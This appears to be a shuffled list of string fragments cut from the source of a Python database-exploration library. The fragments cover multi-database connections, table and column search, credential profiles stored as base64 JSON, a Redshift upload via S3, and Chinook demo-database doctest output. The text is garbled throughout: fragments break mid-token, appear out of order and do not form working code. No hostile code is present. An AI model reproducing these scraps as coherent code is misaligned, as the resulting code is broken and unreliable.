'''", "HAS_PG = True except ImportError: HAS_PG = False try: import MySQLdb mysql_connect =", ">>> from db import DemoDB >>> db = DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ |", "<NAME>, <NAME> 210834 8 1 <NAME>, <NAME>, <NAME> 203102 9 1 <NAME>, <NAME>,", "foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for row in foreign_keys: sql_insert", "int (10000) Number of DataFrame chunks to upload and COPY from S3. Upload", "in os.listdir(user): if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f)) tables = profile.pop('tables', None) if", "}} , ... {{/if}} ... {{/cols}} ... FROM ... Album; ... ''' >>>", "elif dbtype==\"sqlite\" and filename is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) else:", "in relationship tuple is the table name table_db_ref_keys[rel[1]].append(rel) # generate our Tables, and", "INTEGER | | Invoice | InvoiceId | INTEGER | | Invoice | CustomerId", "metadata for all tables as list of tuples if told to use cached", "base64 encoded JSON file. 
This is not to say this a secure way", "pybars from .column import Column, ColumnSet from .table import Table, TableSet from .s3", "Those About To Rock We Salute You Name UnitPrice 0 For Those About", "doesn't come with any metatables (at least ones that fit into our framework),", "glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables) def find_column(self, search, data_type=None): \"\"\" Aggresively search through", "mysql_connect = MySQLdb.connect HAS_MYSQL = True except ImportError: try: import pymysql mysql_connect =", "+----------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Employee | Address |", "= s3_bucket else: bucket = conn.create_bucket(bucket_name, location=bucket_location) # we're going to chunk the", "your db.py profile.\"\"\" if len(self.tables) > 0: f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict())", "{{else}} ... {{ . }} , ... {{/if}} ... {{/cols}} ... FROM ...", "data, union=True): if (sys.version_info < (3, 0)): q = unicode(q) template = self.handlebars.compile(q)", "limit {limit}\".format(q=q, limit=limit) return q # mssql else: if limit: q = \"select", "We Salute You 6 For Those About To Rock We Salute You 7", "come with any metatables (at least ones that fit into our framework), so", "Columns, and attach to each table to the table name in dict for", "NVARCHAR(70) | | InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine | InvoiceId", "Get It Up 0.99 7 Inject The Venom 0.99 8 Snowballed 0.99 9", "creds.get('port') self.filename = creds.get('filename') self.dbname = creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas = creds.get('schemas')", "adding limit={X} to the `query` method, or by passing an argument to `DB()`.", "# returns all tables prefixed w/ prod_ >>> results = db.find_table(\"*Invoice*\") # returns", "bucket_location to default. 
# we can't do this in the function definition because", "generate our Tables, and load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates,", "u'port': 5432, u'username': None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com',", "# 1. load directly from cache # 2. use a single query for", "running on. defaults to default port for db. portgres: 5432 redshift: 5439 mysql:", "or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str) self.cur = self.con.cursor() except: self.con =", "tables prefixed w/ prod_ >>> results = db.find_table(\"*Invoice*\") # returns all tables containing", "tables and columns. \"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta) #", "filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False): if port is", "It Up 1 1 7 8 Inject The Venom 1 1 8 9", "Most of you probably don't need this, but if you're a db admin", "We Salute You 8 For Those About To Rock We Salute You 9", "db.query(\"select * from Track\").head(2) TrackId Name AlbumId MediaTypeId \\\\\\r 0 1 For Those", "3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051 4 1 Deaffy & R.A.", "in sorted(tables.keys())]) elif not use_cache: self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column)", "for (table_schema, table_name, column_name, data_type) in cols: if table_name not in tables: tables[table_name]", "Album | ArtistId | INTEGER | | Artist | ArtistId | INTEGER |", "indicates that there will be no limit (That's right, you'll be limitless. Bradley", "you're looking for data_type: str, list (optional) specify which data type(s) you want", "@last}} ... {{ . }} ... {{else}} ... {{ . 
}} , ...", "our framework), so we're going to create them. \"\"\" sys.stderr.write(\"Indexing schema. This will", "if use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please wait...\") for table in self._metadata_cache:", "= t.AlbumId; ... ''' >>> len(db.query(q)) 3503 db.query(q, limit=10) Title \\ 0 For", "through your database's schema for a table. Parameters ----------- search: str glob pattern", "if dbtype==\"postgres\": port = 5432 elif dbtype==\"redshift\": port = 5439 elif dbtype==\"mysql\": port", "| Customer | CustomerId | INTEGER | | Employee | EmployeeId | INTEGER", "}} ... GROUP BY ... table_name ... ''' >>> data = [ ...", "print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear down the bucket sys.stderr.write(\"Tearing", "def remove_profile(name, s3=False): \"\"\" Removes a profile from your config \"\"\" user =", "table in self.tables: for col in vars(table): if glob.fnmatch.fnmatch(col, search): if data_type and", "FROM sqlite_master ;\") for (table_name, sql) in self.cur: rgx = \"FOREIGN KEY \\(\\[(.*)\\]\\)", "InvoiceId | INTEGER | | Invoice | CustomerId | INTEGER | | Invoice", "credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql:", "Genre | GenreId | INTEGER | | Invoice | InvoiceId | INTEGER |", "_gen_tables_from_col_tuples(self, cols): tables = {} # generate our Columns, and attach to each", "chunk_size: int (10000) Number of DataFrame chunks to upload and COPY from S3.", "trans >>> results = db.find_table(\"*\") # returns everything \"\"\" tables = [] for", "1 1 8 9 Snowballed 1 1 9 10 Evil Walks 1 1", "0 11170334 0.99 1 5510424 0.99 2 3990994 0.99 3 4331779 0.99 4", "type='table';\")] for table in tables: for row in self.cur.execute(\"pragma 
table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2]))", "looking for Examples ---------- >>> from db import DemoDB >>> db = DemoDB()", "db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>> from db import DemoDB >>> db = DemoDB()", "1 <NAME>, <NAME>, <NAME> 263497 Bytes UnitPrice 0 11170334 0.99 1 5510424 0.99", "self._gen_tables_from_col_tuples(col_meta) # Three modes for refreshing schema # 1. load directly from cache", "import DemoDB >>> db = DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ | Table | Columns", "statment. # # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3 in chunks\".format(name)) len_df =", "boto.s3.connection import S3Connection from boto.s3.key import Key from boto.s3.connection import Location # if", "data = [ ... {\"name\": \"Album\"}, ... {\"name\": \"Artist\"}, ... {\"name\": \"Track\"} ...", "like '%REFERENCES%';\") # find for foreign keys self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create", "to the `query` method, or by passing an argument to `DB()`. None indicates", "INTEGERS +-------------+----------------+--------------+ | Table | Column Name | Type | +-------------+----------------+--------------+ | Customer", "{limit} * from ({q}) q\".format(limit=limit, q=q) return q def _apply_handlebars(self, q, data, union=True):", "= [] self.cur.execute(\"SELECT name, sql FROM sqlite_master ;\") for (table_name, sql) in self.cur:", ".utils import profile_path, load_profile, load_from_json, dump_to_json from .query_templates import query_templates # attempt to", "isinstance(getattr(table, col), Column): cols.append(getattr(table, col)) return ColumnSet(cols) def _assign_limit(self, q, limit=1000): # postgres,", "\\\\\\r 0 1 <NAME>, <NAME>, <NAME> 343719 11170334 1 1 None 342562 5510424", "Track t ... on a.AlbumId = t.AlbumId; ... 
''' >>> len(db.query(q)) 3503 db.query(q,", "your config \"\"\" user = os.path.expanduser(\"~\") if s3: f = os.path.join(user, S3_PROFILE_ID +", "@property def tables(self): \"\"\"A lazy loaded reference to the table metadata for the", "bucket_location: boto.s3.connection.Location a specific AWS location in which to create the temporary transfer", "not specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift\") self._query_templates", "We Salute You 7 For Those About To Rock We Salute You 8", "AWS_SECRET_KEY from your environment variables s3: S3 alternative to using keys, you can", "2 2 3 Restless and Wild 2 3 4 Let There Be Rock", "Milliseconds Bytes \\\\\\r 0 1 <NAME>, <NAME>, <NAME> 343719 11170334 1 1 None", "3306 sqlite: n/a mssql: 1433 filename: str path to sqlite database dbname: str", "| | InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine | InvoiceId |", "port = 3306 elif dbtype==\"sqlite\": port = None elif dbtype==\"mssql\": port = 1433", "... {{#cols}} ... {{#if @last}} ... {{ . }} ... {{else}} ... {{", "have to save them in script. Parameters ---------- profile: str (optional) identifier/name for", "| NVARCHAR(120) | | MediaType | Name | NVARCHAR(120) | | Playlist |", "filename, data=None, union=True, limit=None): \"\"\" Query your database from a file. Parameters ----------", "self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur return col_meta, table_meta def _gen_tables_from_col_tuples(self, cols): tables =", "a dataframe to redshift via s3. 
Parameters ---------- name: str name for your", "sorted(tables.keys())]) elif not use_cache: self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for", "= self.hostname self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor() self._tables =", "| NVARCHAR(70) | | Genre | GenreId | INTEGER | | Invoice |", "0.99 1 Balls to the Wall 0.99 2 Fast As a Shark 0.99", "\"\").replace(\"]\", \"\") # we'll create the table ONLY if it doens't exist sql", "Fast As a Shark 3 2 3 4 Restless and Wild 3 2", "an environment variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users with permission", "foreign_table varchar, foreign_column varchar);\") foreign_keys = [] self.cur.execute(\"SELECT name, sql FROM sqlite_master ;\")", "query. This is used by the DB.query method. You can override it by", "any handlebars queries as a single data frame. limit: int Number of records", "db.query(q, data=data) table_name cnt 0 Album 347 1 Artist 275 2 Track 3503", "records to return Examples -------- >>> from db import DemoDB >>> db =", "of tuples, to match how normal loading is performed for col in table['columns']:", "self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for rel in self.cur: # second value in relationship", "Inject The Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 >>> template", "{{#cols}} ... {{#if @last}} ... {{ . }} ... {{else}} ... 
{{ .", "installed\") if s3 is not None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY = s3.secret_key if", "f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads = [] for i in chunks:", "= \"DROP TABLE IF EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) #", "Please ensure it is installed\") creds = {} for arg in [\"username\", \"password\",", "2 nodes you will want chunk_size=4, 8, etc AWS_ACCESS_KEY: str your aws access", "= None elif dbtype==\"mssql\": port = 1433 elif profile is not None: pass", "For Those About To Rock We Salute You 7 For Those About To", "not in tables: tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name, data_type, self.keys_per_column))", "AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload a dataframe to redshift via s3.", "& R.A. Smith-Diesel 375418 5 1 <NAME>, <NAME>, <NAME> 205662 6 1 <NAME>,", "except: from io import StringIO # Python 3.3+ import uuid import re import", "| GenreId | INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all columns containing Address", "BY ... table_name ... ''' >>> data = [ ... {\"name\": \"Album\"}, ...", "profile) dump_to_json(f, self.to_dict()) @property def credentials(self): \"\"\"Dict representation of all credentials for the", "can't do this in the function definition because we're # lazily importing boto", "username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None,", "if limit: q = \"select top {limit} * from ({q}) q\".format(limit=limit, q=q) return", "importing boto only if necessary here. 
if bucket_location is None: bucket_location = Location.DEFAULT", "hooks up to the Chinook DB See http://chinookdatabase.codeplex.com/ for more info. \"\"\" _ROOT", "from Track\").head(2) TrackId Name AlbumId MediaTypeId \\\\\\r 0 1 For Those About To", "self._query_templates, table_schema, table_name, column_name, data_type, self.keys_per_column)) return tables def _try_command(self, cmd): try: self.cur.execute(cmd)", "self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables,", "Smith-Diesel 375418 5 1 <NAME>, <NAME>, <NAME> 205662 6 1 <NAME>, <NAME>, <NAME>", "filename: str A SQL script data: list, dict Optional argument for handlebars-queries. Data", "chunk_size=4, 8, etc AWS_ACCESS_KEY: str your aws access key. if this is None,", "table_db_ref_keys = defaultdict(list) for rel in self.cur: # second value in relationship tuple", ">>> with open(\"db/tests/myscript.sql\", \"w\") as f: ... f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10", "pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables = exclude_system_tables", "return q def _apply_handlebars(self, q, data, union=True): if (sys.version_info < (3, 0)): q", "it is installed\") self.con = sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if", "= sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not HAS_MYSQL: raise Exception(\"Couldn't", "FROM ... Album; ... ''' >>> data = {\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>>", "schemas: list List of schemas to include. Defaults to all. 
profile: str Preconfigured", "= db.find_table(\"tmp*\") # returns all tables prefixed w/ tmp >>> results = db.find_table(\"prod_*\")", "SupportRepId | INTEGER | | Customer | CustomerId | INTEGER | | Employee", "object print_sql: bool (False) option for printing sql statement that will be executed", "not HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb or pymysql library. Please ensure it is", "TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars = pybars.Compiler() @property def tables(self): \"\"\"A lazy loaded", "not to say this a secure way to store sensitive data, but it", "tables: profile['metadata'] = True else: profile['metadata'] = False profiles[f[7:]] = profile return profiles", "the table metadata for the DB.\"\"\" if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return", "= s3.secret_key if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None:", "q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur return col_meta, table_meta def _gen_tables_from_col_tuples(self, cols):", "query by doing it one time, database-wide, if query is available elif not", "Salute You 9 For Those About To Rock We Salute You Name UnitPrice", "dump_to_json from .query_templates import query_templates # attempt to import the relevant database libraries", "df[i:(i+chunk_size)] k = Key(bucket) k.key = '<KEY>' % (i, i + chunk_size) k.set_metadata('parent',", "To Rock We Salute You 7 For Those About To Rock We Salute", "e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an instance of DB that hooks up", "containing Address that are varchars +----------+----------------+--------------+ | Table | Column Name | Type", "| ReportsTo | INTEGER | | Employee | EmployeeId | INTEGER | |", "= TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, 
foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())])", "password self.hostname = hostname self.port = port self.filename = filename self.dbname = dbname", "0.99 8 6599424 0.99 9 8611245 0.99 >>> q = ''' ... SELECT", "+ name) else: f = os.path.join(user, DBPY_PROFILE_ID + name) try: try: open(f) except:", "IF NOT EXISTS\") if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() # perform the", "MediaType | MediaTypeId | INTEGER | | Track | MediaTypeId | INTEGER |", "database properties to your db.py profile.\"\"\" if len(self.tables) > 0: f = profile_path(DBPY_PROFILE_ID,", "| INTEGER | | Invoice | CustomerId | INTEGER | | Invoice |", "= \"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql is None: continue for", ">>> db = DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3", "probably stop your little sister from stealing your passwords. 
Parameters ---------- profile: str", "second...\") rows_to_insert = [] tables = [row[0] for row in self.cur.execute(\"select name from", "Examples ---------- >>> from db import DemoDB >>> db = DemoDB() >>> len(db.find_column(\"Name\").columns)", "this in the function definition because we're # lazily importing boto only if", "| +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all columns ending w/ Id +---------------+---------------+---------+ | Table", "it is installed\") creds = {} for arg in [\"username\", \"password\", \"hostname\", \"port\",", "self.cur del self.con def load_credentials(self, profile=\"default\"): \"\"\" Loads crentials for a given profile.", "schemas_str = ','.join([repr(schema) for schema in self.schemas]) q = self._query_templates['system']['schema_specified'] % schemas_str elif", "(optional) specify which data type(s) you want to return Examples ---------- >>> from", "for rel in self.cur: # second value in relationship tuple is the table", "w/ Id +---------------+---------------+---------+ | Table | Column Name | Type | +---------------+---------------+---------+ |", "self._metadata_cache = self.load_metadata(profile) else: self.username = username self.password = password self.hostname = hostname", "col_meta = [] table_meta = {} # pull out column metadata for all", "table_name not in tables: tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name, data_type,", "self.password, \"hostname\": self.hostname, \"port\": self.port, \"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas,", "environment variables s3: S3 alternative to using keys, you can use an S3", "Exception(\"Credentials not configured!\") def save_credentials(self, profile=\"default\"): \"\"\" Save your database credentials so you", "AWS_SECRET_KEY) #this way users with permission on specific buckets can use this feature", "data = 
{\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data, union=False)) 347 db.query(q, data=data,", "maybe add warnings? try: import psycopg2 as pg HAS_PG = True except ImportError:", "* from ({q}) q\".format(limit=limit, q=q) return q def _apply_handlebars(self, q, data, union=True): if", "table metadata table_meta[table['name']] = {k: table[k] for k in ('schema', 'name', 'foreign_keys', 'ref_keys')}", "0.99 5 6713451 0.99 6 7636561 0.99 7 6852860 0.99 8 6599424 0.99", "Examples -------- >>> from db import DemoDB >>> db = DemoDB() db.query(\"select *", "DemoDB >>> db = DemoDB() >>> q = ''' ... SELECT ... a.Title,", "include. Defaults to all. profile: str Preconfigured database credentials / profile for how", "a given profile. Profiles are stored in ~/.db.py_{profile_name} and are a base64 encoded", "AlbumId | INTEGER | | Album | ArtistId | INTEGER | | Artist", "AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY')", "u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None, u'port': 5432, u'username': None}, 'muppets': {u'dbname':", "table_db_ref_keys[rel[1]].append(rel) # generate our Tables, and load them into a TableSet self._tables =", "tuple is the table name table_db_ref_keys[rel[1]].append(rel) # generate our Tables, and load them", "S3 from .utils import profile_path, load_profile, load_from_json, dump_to_json from .query_templates import query_templates #", "| Type | +---------------+---------------+---------+ | Album | AlbumId | INTEGER | | Album", "[ ... {\"name\": \"Album\"}, ... {\"name\": \"Artist\"}, ... {\"name\": \"Track\"} ... ] >>>", "going to create them. \"\"\" sys.stderr.write(\"Indexing schema. 
This will take a second...\") rows_to_insert", "dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass \"\"\" def __init__(self, username=None,", "needs in order to operate). This includes things like schema definitions. Most of", "Rock We Salute You 8 For Those About To Rock We Salute You", "FROM ... {{ name }} ... GROUP BY ... table_name ... ''' >>>", "try: try: open(f) except: raise Exception(\"Profile '{0}' does not exist. Could not find", "by passing an argument to `DB()`. None indicates that there will be no", "def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta = [] table_meta = {} # pull out", "Column Name | Type | +----------+----------------+--------------+ | Customer | Address | NVARCHAR(70) |", "f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f)) tables = profile.pop('tables', None) if tables: profile['metadata'] =", "driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", database=self.dbname or '' ) conn_str =", "# we're going to chunk the file into pieces. 
according to amazon, this", "port = None elif dbtype==\"mssql\": port = 1433 elif profile is not None:", "INTEGER | | InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine | InvoiceId", "all tables as list of tuples if told to use cached metadata if", "is performed for col in table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema.", "| Type | +-----------+-------------+---------------+ | Artist | Name | NVARCHAR(120) | | Genre", "return tables def _try_command(self, cmd): try: self.cur.execute(cmd) except Exception as e: print (\"Error", "profile_path(DBPY_PROFILE_ID, profile) if f: creds = load_from_json(f) self.username = creds.get('username') self.password = creds.get('password')", "hostname self.port = port self.filename = filename self.dbname = dbname self.dbtype = dbtype", "operate). This includes things like schema definitions. Most of you probably don't need", "password=self.password ) ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str) self.cur = self.con.cursor()", "is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if", "else: bucket = conn.create_bucket(bucket_name, location=bucket_location) # we're going to chunk the file into", "using SQLite format. need to convert it to Postgres sql = sql.replace(\"[\", \"\").replace(\"]\",", "by doing it one time, database-wide, if query is available elif not use_cache", "a.Title, ... t.Name, ... t.UnitPrice ... FROM ... Album a ... INNER JOIN", ">>> len(db.query(q)) 3503 db.query(q, limit=10) Title \\ 0 For Those About To Rock", "schemas to include. Defaults to all. profile: str Preconfigured database credentials / profile", "profile) dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile) if f: prof", "= t.AlbumId; ... 
''' >>> with open(\"db/tests/myscript.sql\", \"w\") as f: ... f.write(q) 109", "elif dbtype==\"redshift\": port = 5439 elif dbtype==\"mysql\": port = 3306 elif dbtype==\"sqlite\": port", "| INTEGER | | Track | GenreId | INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") #", "driver=\"{FreeTDS}\") from db import DB try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432,", "str A SQL script data: list, dict Optional argument for handlebars-queries. Data will", "= \".db.py_s3_\" class DB(object): \"\"\" Utility for exploring and querying a database. Parameters", "(\"sqlite\", \"mssql\") and username is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) elif", "a query. This is used by the DB.query method. You can override it", "def load_credentials(self, profile=\"default\"): \"\"\" Loads crentials for a given profile. Profiles are stored", "[\"username\", \"password\", \"hostname\", \"port\", \"dbname\"]: if getattr(self, arg): value = getattr(self, arg) if", "find MySQLdb or pymysql library. Please ensure it is installed\") creds = {}", "ArtistId, Name | +--------+--------------------------+ >>> results = db.find_table(\"tmp*\") # returns all tables prefixed", "\"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column, }", "= self.con.cursor() except: self.con = pyo.connect( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\",", "data type(s) you want to return Examples ---------- >>> from db import DemoDB", "the same order, making doctest fail. db.find_column(\"Name\") # returns all columns named \"Name\"", "crentials for a given profile. 
Profiles are stored in ~/.db.py_{profile_name} and are a", "263497 Bytes UnitPrice 0 11170334 0.99 1 5510424 0.99 2 3990994 0.99 3", "Driver for mssql/pyodbc connections. Examples -------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db", "True except ImportError: HAS_MYSQL = False try: import sqlite3 as sqlite HAS_SQLITE =", "the Wall 2 Restless and Wild 3 Restless and Wild 4 Restless and", "schemas_str elif exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta =", "if self.schemas is not None and isinstance(self.schemas, list) and 'schema_specified' in \\ self._query_templates['system']:", "'{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None,", "\"Name\" +-----------+-------------+---------------+ | Table | Column Name | Type | +-----------+-------------+---------------+ | Artist", "| INTEGER | | Track | AlbumId | INTEGER | | Track |", "table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for rel in self.cur: # second value in", "keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())]) # optimize the foreign/ref key query", "'foreign_keys', 'ref_keys')} # col metadata: format as list of tuples, to match how", "row[1], row[2])) # find for table and column names self.cur.execute(\"drop table if exists", "* from Track\").head(2) TrackId Name AlbumId MediaTypeId \\\\\\r 0 1 For Those About", "MediaTypeId | INTEGER | | Track | MediaTypeId | INTEGER | | Track", "of records to return Examples -------- >>> from db import DemoDB >>> db", "pymysql db = DB(username=\"hank\", 
password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\",", "+---------------+---------------+---------+ | Table | Column Name | Type | +---------------+---------------+---------+ | Album |", "Salute You 1 Balls to the Wall 2 Restless and Wild 3 Restless", "2 3 Fast As a Shark 3 2 3 4 Restless and Wild", "... t.UnitPrice ... FROM ... Album a ... INNER JOIN ... Track t", "7 Inject The Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 >>>", "S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users with permission on specific buckets can use this", "t, tables[t], keys_per_column=self.keys_per_column) for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta", "os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None: raise Exception(\"Must specify AWS_ACCESS_KEY as either function argument", "dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\",", "if not HAS_ODBC and not HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc or pymssql libraries.", ">>> len(db.query(q, data=data, union=False)) 347 db.query(q, data=data, union=False) AlbumId Title ArtistId 0 1", "0 1 <NAME>, <NAME>, <NAME> 343719 1 1 None 342562 2 1 <NAME>,", "3 Restless and Wild 0.99 4 Princess of the Dawn 0.99 5 Put", "foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())]) # optimize the foreign/ref key query by", "in sorted(tables.keys())]) # optimize the foreign/ref key query by doing it one time,", "ALL\".join(query) else: query = \"\\n\".join(query) elif isinstance(data, dict): query = template(data) query =", "if query is available elif not use_cache and 
isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db'])", "-------- No doctest, covered by unittest list_profiles() {'demo': {u'dbname': None, u'dbtype': u'sqlite', u'filename':", "load_profile, load_from_json, dump_to_json from .query_templates import query_templates # attempt to import the relevant", "search: str glob pattern for what you're looking for Examples ---------- >>> from", "specify AWS_ACCESS_KEY as either function argument or as an environment variable `AWS_ACCESS_KEY`\") if", "reference to the table metadata for the DB.\"\"\" if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables,", "ImportError: HAS_ODBC = False try: import pymssql HAS_PYMSSQL = True except ImportError: HAS_PYMSSQL", "---------- q: str Query string to execute data: list, dict Optional argument for", "You 9 For Those About To Rock We Salute You Name UnitPrice 0", "find file {1}\".format(name, f)) os.remove(f) except Exception as e: raise Exception(\"Could not remove", "list (optional) specify which data type(s) you want to return Examples ---------- >>>", "q def _apply_handlebars(self, q, data, union=True): if (sys.version_info < (3, 0)): q =", "f: prof = load_from_json(f) return prof.get('tables', None) def save_metadata(self, profile=\"default\"): \"\"\"Save the database", "it'll pick up # all of the data*.gz files we've created sys.stderr.write(\"Copying data", "os.path.expanduser(\"~\") for f in os.listdir(user): if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f)) tables =", "your database is running on (i.e. \"localhost\", \"10.20.1.248\") port: int Port the database", "or pymysql library. 
